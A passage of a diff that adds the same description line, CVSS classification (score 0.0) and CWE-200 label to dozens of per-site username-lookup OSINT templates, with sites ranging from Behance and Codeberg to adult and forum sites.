self-contained: true diff --git a/osint/behance.yaml b/osint/behance.yaml index 4575c1bdea..f9b50fcdbf 100644 --- a/osint/behance.yaml +++ b/osint/behance.yaml @@ -3,7 +3,12 @@ id: behance info: name: Behance author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-business,behance self-contained: true diff --git a/osint/bentbox.yaml b/osint/bentbox.yaml index 8de8e8f1b7..698d481a3f 100644 --- a/osint/bentbox.yaml +++ b/osint/bentbox.yaml @@ -3,7 +3,12 @@ id: bentbox info: name: Bentbox author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,bentbox self-contained: true diff --git a/osint/biggerpockets.yaml b/osint/biggerpockets.yaml index 21ded4b607..a8a5455187 100644 --- a/osint/biggerpockets.yaml +++ b/osint/biggerpockets.yaml @@ -3,7 +3,12 @@ id: biggerpockets info: name: BiggerPockets author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-finance,biggerpockets self-contained: true diff --git a/osint/bigo-live.yaml b/osint/bigo-live.yaml index 14712aa7a5..1bab814d66 100644 --- a/osint/bigo-live.yaml +++ b/osint/bigo-live.yaml @@ -3,7 +3,12 @@ id: bigo-live info: name: BIGO Live author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,bigo-live self-contained: true diff --git a/osint/bikemap.yaml b/osint/bikemap.yaml index 7f96d295d6..282602ab66 100644 --- a/osint/bikemap.yaml +++ b/osint/bikemap.yaml @@ -3,7 +3,12 @@ id: bikemap info: name: Bikemap author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-health,bikemap self-contained: true diff --git a/osint/bimpos.yaml b/osint/bimpos.yaml index b94b5a8fdf..bad7235814 100644 --- a/osint/bimpos.yaml +++ b/osint/bimpos.yaml @@ -3,7 +3,12 @@ id: bimpos info: name: Bimpos author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-tech,bimpos self-contained: true diff --git a/osint/biolink.yaml b/osint/biolink.yaml index ec726f23b8..5b9977ced7 100644 --- a/osint/biolink.yaml +++ b/osint/biolink.yaml @@ -3,7 +3,12 @@ id: biolink info: name: biolink author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,biolink self-contained: true diff --git a/osint/bitbucket.yaml b/osint/bitbucket.yaml index 4188e69cad..51f77f3f87 100644 --- a/osint/bitbucket.yaml +++ b/osint/bitbucket.yaml @@ -3,7 +3,12 @@ id: bitbucket info: name: Bitbucket author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-coding,bitbucket self-contained: true diff --git a/osint/bitchute.yaml b/osint/bitchute.yaml index f372cf4749..5d1026b971 100644 --- a/osint/bitchute.yaml +++ b/osint/bitchute.yaml @@ -3,7 +3,12 @@ id: bitchute info: name: Bitchute author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-political,bitchute self-contained: true diff --git a/osint/bitcoin-forum.yaml b/osint/bitcoin-forum.yaml index 8d1e03b857..fd25a62f65 100644 --- a/osint/bitcoin-forum.yaml +++ b/osint/bitcoin-forum.yaml @@ -3,7 +3,12 @@ id: bitcoin-forum info: name: bitcoin forum author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-finance,bitcoin-forum self-contained: true diff --git a/osint/bittube.yaml b/osint/bittube.yaml index d505702328..09f98dff1f 100644 --- a/osint/bittube.yaml +++ b/osint/bittube.yaml @@ -3,7 +3,12 @@ id: bittube info: name: bittube author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-video,bittube self-contained: true diff --git a/osint/blipfm.yaml b/osint/blipfm.yaml index 2bb312c78d..1fc4afe209 100644 --- a/osint/blipfm.yaml +++ b/osint/blipfm.yaml @@ -3,7 +3,12 @@ id: blipfm info: name: BLIP.fm author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-music,blipfm self-contained: true diff --git a/osint/blogger.yaml b/osint/blogger.yaml index e414d24edb..a6c8955d96 100644 --- a/osint/blogger.yaml +++ b/osint/blogger.yaml @@ -3,7 +3,12 @@ id: blogger info: name: Blogger author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-blog,blogger self-contained: true diff --git a/osint/blogipl.yaml b/osint/blogipl.yaml index 149b3c7b2b..450165c668 100644 --- a/osint/blogipl.yaml +++ b/osint/blogipl.yaml @@ -3,7 +3,12 @@ id: blogipl info: name: blogi.pl author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-blog,blogipl self-contained: true diff --git a/osint/blogmarks.yaml b/osint/blogmarks.yaml index 0408b6c613..cf36c664b9 100644 --- a/osint/blogmarks.yaml +++ b/osint/blogmarks.yaml @@ -3,7 +3,12 @@ id: blogmarks info: name: Blogmarks author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,blogmarks self-contained: true diff --git a/osint/blogspot.yaml b/osint/blogspot.yaml index ce485e1aec..460d4be281 100644 --- a/osint/blogspot.yaml +++ b/osint/blogspot.yaml @@ -3,7 +3,12 @@ id: blogspot info: name: Blogspot author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-blog,blogspot self-contained: true diff --git a/osint/bodybuildingcom.yaml b/osint/bodybuildingcom.yaml index e10777af59..86c8164704 100644 --- a/osint/bodybuildingcom.yaml +++ b/osint/bodybuildingcom.yaml @@ -3,7 +3,12 @@ id: bodybuildingcom info: name: BodyBuilding.com author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-health,bodybuildingcom self-contained: true diff --git a/osint/bonga-cams.yaml b/osint/bonga-cams.yaml index c7b5e854fa..3ee0881f41 100644 --- a/osint/bonga-cams.yaml +++ b/osint/bonga-cams.yaml @@ -3,7 +3,12 @@ id: bonga-cams info: name: bonga_cams author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,bonga-cams self-contained: true diff --git a/osint/bookcrossing.yaml b/osint/bookcrossing.yaml index 78dcbf81b5..0bb570e444 100644 --- a/osint/bookcrossing.yaml +++ b/osint/bookcrossing.yaml @@ -3,7 +3,12 @@ id: bookcrossing info: name: Bookcrossing author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,bookcrossing self-contained: true diff --git a/osint/boosty.yaml b/osint/boosty.yaml index 4279b7673f..733ae7c152 100644 --- a/osint/boosty.yaml +++ b/osint/boosty.yaml @@ -3,7 +3,12 @@ id: boosty info: name: boosty author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,boosty self-contained: true diff --git a/osint/booth.yaml b/osint/booth.yaml index 91efc321ba..6a58ccabd6 100644 --- a/osint/booth.yaml +++ b/osint/booth.yaml @@ -3,7 +3,12 @@ id: booth info: name: Booth author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-shopping,booth self-contained: true diff --git a/osint/breach-forums.yaml b/osint/breach-forums.yaml index 0a7f3d6153..a6362b989c 100644 --- a/osint/breach-forums.yaml +++ b/osint/breach-forums.yaml @@ -3,7 +3,12 @@ id: breach-forums info: name: Breach Forums author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-tech,breach-forums self-contained: true diff --git a/osint/brickset.yaml b/osint/brickset.yaml index 50e581d92b..118b34649b 100644 --- a/osint/brickset.yaml +++ b/osint/brickset.yaml @@ -3,7 +3,12 @@ id: brickset info: name: Brickset author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,brickset self-contained: true diff --git a/osint/bugcrowd.yaml b/osint/bugcrowd.yaml index 7fb7f75ae1..87f06213ba 100644 --- a/osint/bugcrowd.yaml +++ b/osint/bugcrowd.yaml @@ -3,7 +3,12 @@ id: bugcrowd info: name: Bugcrowd author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-tech,bugcrowd self-contained: true diff --git a/osint/bunpro.yaml b/osint/bunpro.yaml index 4796bd3ba4..3464e739e7 100644 --- a/osint/bunpro.yaml +++ b/osint/bunpro.yaml @@ -3,7 +3,12 @@ id: bunpro info: name: Bunpro author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,bunpro self-contained: true diff --git a/osint/buymeacoffee.yaml b/osint/buymeacoffee.yaml index c3815365aa..ac40e936ec 100644 --- a/osint/buymeacoffee.yaml +++ b/osint/buymeacoffee.yaml @@ -3,7 +3,12 @@ id: buymeacoffee info: name: buymeacoffee author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-finance,buymeacoffee self-contained: true diff --git a/osint/buzzfeed.yaml b/osint/buzzfeed.yaml index 943c97c308..40b6e8dbd4 100644 --- a/osint/buzzfeed.yaml +++ b/osint/buzzfeed.yaml @@ -3,7 +3,12 @@ id: buzzfeed info: name: BuzzFeed author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,buzzfeed self-contained: true diff --git a/osint/buzznet.yaml b/osint/buzznet.yaml index 953c62af9e..c8f94c28af 100644 --- a/osint/buzznet.yaml +++ b/osint/buzznet.yaml @@ -3,7 +3,12 @@ id: buzznet info: name: Buzznet author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-news,buzznet self-contained: true diff --git a/osint/cafecito.yaml b/osint/cafecito.yaml index 188f386da5..632a9d3eed 100644 --- a/osint/cafecito.yaml +++ b/osint/cafecito.yaml @@ -3,7 +3,12 @@ id: cafecito info: name: cafecito author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,cafecito self-contained: true diff --git a/osint/calendy.yaml b/osint/calendy.yaml index b89d7e4173..71b4aaf07e 100644 --- a/osint/calendy.yaml +++ b/osint/calendy.yaml @@ -3,7 +3,12 @@ id: calendy info: name: Calendy author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,calendy self-contained: true diff --git a/osint/cameo.yaml b/osint/cameo.yaml index df19d4e969..27286d6389 100644 --- a/osint/cameo.yaml +++ b/osint/cameo.yaml @@ -3,7 +3,12 @@ id: cameo info: name: Cameo author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-shopping,cameo self-contained: true diff --git a/osint/carbonmade.yaml b/osint/carbonmade.yaml index 9569068a97..65a7fef000 100644 --- a/osint/carbonmade.yaml +++ b/osint/carbonmade.yaml @@ -3,7 +3,12 @@ id: carbonmade info: name: Carbonmade author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,carbonmade self-contained: true diff --git a/osint/careerhabr.yaml b/osint/careerhabr.yaml index 5d69d65429..e2208fc617 100644 --- a/osint/careerhabr.yaml +++ b/osint/careerhabr.yaml @@ -3,7 +3,12 @@ id: careerhabr info: name: Career.habr author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-business,careerhabr self-contained: true diff --git a/osint/caringbridge.yaml b/osint/caringbridge.yaml index 927843012f..df3f0ad7fe 100644 --- a/osint/caringbridge.yaml +++ b/osint/caringbridge.yaml @@ -3,7 +3,12 @@ id: caringbridge info: name: CaringBridge author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-health,caringbridge self-contained: true diff --git a/osint/carrdco.yaml b/osint/carrdco.yaml index 12e39b2625..6f88359737 100644 --- a/osint/carrdco.yaml +++ b/osint/carrdco.yaml @@ -3,7 +3,12 @@ id: carrdco info: name: carrd.co author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-business,carrdco self-contained: true diff --git a/osint/cashapp.yaml b/osint/cashapp.yaml index 32eb1ace3d..27d4b34aae 100644 --- a/osint/cashapp.yaml +++ b/osint/cashapp.yaml @@ -3,7 +3,12 @@ id: cashapp info: name: cash.app author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-finance,cashapp self-contained: true diff --git a/osint/castingcallclub.yaml b/osint/castingcallclub.yaml index e14d3a1338..ada40868e4 100644 --- a/osint/castingcallclub.yaml +++ b/osint/castingcallclub.yaml @@ -3,7 +3,12 @@ id: castingcallclub info: name: CastingCallClub author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,castingcallclub self-contained: true diff --git a/osint/cd-action.yaml b/osint/cd-action.yaml index a202fd6f33..df38152dcc 100644 --- a/osint/cd-action.yaml +++ b/osint/cd-action.yaml @@ -3,7 +3,12 @@ id: cd-action info: name: CD-Action author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,cd-action self-contained: true diff --git a/osint/cdapl.yaml b/osint/cdapl.yaml index f2337695c7..b12fa97fd6 100644 --- a/osint/cdapl.yaml +++ b/osint/cdapl.yaml @@ -3,7 +3,12 @@ id: cdapl info: name: cda.pl author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-video,cdapl self-contained: true diff --git a/osint/championat.yaml b/osint/championat.yaml index 2e4a5e552e..9ed1e977cb 100644 --- a/osint/championat.yaml +++ b/osint/championat.yaml @@ -3,7 +3,12 @@ id: championat info: name: championat author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-news,championat self-contained: true diff --git a/osint/chamsko.yaml b/osint/chamsko.yaml index b444303452..a947a85356 100644 --- a/osint/chamsko.yaml +++ b/osint/chamsko.yaml @@ -3,7 +3,12 @@ id: chamsko info: name: Chamsko author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-images,chamsko self-contained: true diff --git a/osint/chaturbate.yaml b/osint/chaturbate.yaml index 66b6a76439..52c6ccf722 100644 --- a/osint/chaturbate.yaml +++ b/osint/chaturbate.yaml @@ -3,7 +3,12 @@ id: chaturbate info: name: chaturbate author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,chaturbate self-contained: true diff --git a/osint/cheezburger.yaml b/osint/cheezburger.yaml index a7b69e7264..44d67b41ff 100644 --- a/osint/cheezburger.yaml +++ b/osint/cheezburger.yaml @@ -3,7 +3,12 @@ id: cheezburger info: name: cHEEZburger author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,cheezburger self-contained: true diff --git a/osint/chesscom.yaml b/osint/chesscom.yaml index c0aca32eb4..982dd6e647 100644 --- a/osint/chesscom.yaml +++ b/osint/chesscom.yaml @@ -3,7 +3,12 @@ id: chesscom info: name: Chess.com author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,chesscom self-contained: true diff --git a/osint/chomikujpl.yaml b/osint/chomikujpl.yaml index 200a31371d..d9be8d9857 100644 --- a/osint/chomikujpl.yaml +++ b/osint/chomikujpl.yaml @@ -3,7 +3,12 @@ id: chomikujpl info: name: Chomikuj.pl author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,chomikujpl self-contained: true diff --git a/osint/chyoa.yaml b/osint/chyoa.yaml index 894f1476fd..d9320091f3 100644 --- a/osint/chyoa.yaml +++ b/osint/chyoa.yaml @@ -3,7 +3,12 @@ id: chyoa info: name: Chyoa author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,chyoa self-contained: true diff --git a/osint/climatejusticerocks-mastodon-instance.yaml b/osint/climatejusticerocks-mastodon-instance.yaml index 78bb79dc70..5747cf90a5 100644 --- a/osint/climatejusticerocks-mastodon-instance.yaml +++ b/osint/climatejusticerocks-mastodon-instance.yaml @@ -3,7 +3,12 @@ id: climatejusticerocks-mastodon-instance info: name: Climatejustice.rocks (Mastodon Instance) author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,climatejusticerocks-mastodon-instance self-contained: true diff --git a/osint/cloudflare.yaml b/osint/cloudflare.yaml index 50f91820d2..50b989ef46 100644 --- a/osint/cloudflare.yaml +++ b/osint/cloudflare.yaml @@ -3,7 +3,12 @@ id: cloudflare info: name: Cloudflare author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-tech,cloudflare self-contained: true diff --git a/osint/clubhouse.yaml b/osint/clubhouse.yaml index 53ad234553..138295d626 100644 --- a/osint/clubhouse.yaml +++ b/osint/clubhouse.yaml @@ -3,7 +3,12 @@ id: clubhouse info: name: Clubhouse author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,clubhouse self-contained: true diff --git a/osint/clusterdafrica.yaml b/osint/clusterdafrica.yaml index 4de52f8670..37b5814142 100644 --- a/osint/clusterdafrica.yaml +++ b/osint/clusterdafrica.yaml @@ -3,7 +3,12 @@ id: clusterdafrica info: name: clusterdafrica author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,clusterdafrica self-contained: true diff --git a/osint/cnet.yaml b/osint/cnet.yaml index 05594b245c..73c37db360 100644 --- a/osint/cnet.yaml +++ b/osint/cnet.yaml @@ -3,7 +3,12 @@ id: cnet info: name: cnet author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-news,cnet self-contained: true diff --git a/osint/codeberg.yaml b/osint/codeberg.yaml index 0db2ef24e7..487b6d5386 100644 --- a/osint/codeberg.yaml +++ b/osint/codeberg.yaml @@ -3,7 +3,12 @@ id: codeberg info: name: Codeberg author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-coding,codeberg self-contained: true diff --git a/osint/codecademy.yaml b/osint/codecademy.yaml index d1841e7574..e5bfe77b20 100644 --- a/osint/codecademy.yaml +++ b/osint/codecademy.yaml @@ -3,7 +3,12 @@ id: codecademy info: name: Codecademy author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-coding,codecademy self-contained: true diff --git a/osint/codeforces.yaml b/osint/codeforces.yaml index 64286d23e8..78e7eae9ab 100644 --- a/osint/codeforces.yaml +++ b/osint/codeforces.yaml @@ -3,7 +3,12 @@ id: codeforces info: name: codeforces author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-coding,codeforces self-contained: true diff --git a/osint/codementor.yaml b/osint/codementor.yaml index f83d2f200f..42dd89e6d7 100644 --- a/osint/codementor.yaml +++ b/osint/codementor.yaml @@ -3,7 +3,12 @@ id: codementor info: name: codementor author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-coding,codementor self-contained: true diff --git a/osint/coderwall.yaml b/osint/coderwall.yaml index a13450b579..a5c0c15d36 100644 --- a/osint/coderwall.yaml +++ b/osint/coderwall.yaml @@ -3,7 +3,12 @@ id: coderwall info: name: Coderwall author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-coding,coderwall self-contained: true diff --git a/osint/codewars.yaml b/osint/codewars.yaml index 25c0111054..a792788132 100644 --- a/osint/codewars.yaml +++ b/osint/codewars.yaml @@ -3,7 +3,12 @@ id: codewars info: name: Codewars author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-coding,codewars self-contained: true diff --git a/osint/cohost.yaml b/osint/cohost.yaml index bf2993c2e0..4dbbc7ceb7 100644 --- a/osint/cohost.yaml +++ b/osint/cohost.yaml @@ -3,7 +3,12 @@ id: cohost info: name: cohost author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,cohost self-contained: true diff --git a/osint/colourlovers.yaml b/osint/colourlovers.yaml index 5373de9dbd..a127178bd4 100644 --- a/osint/colourlovers.yaml +++ b/osint/colourlovers.yaml @@ -3,7 +3,12 @@ id: colourlovers info: name: COLOURlovers author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,colourlovers self-contained: true diff --git a/osint/contactossex.yaml b/osint/contactossex.yaml index 4b77400ad0..4a0ec3121f 100644 --- a/osint/contactossex.yaml +++ b/osint/contactossex.yaml @@ -3,7 +3,12 @@ id: contactossex info: name: contactos.sex author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + 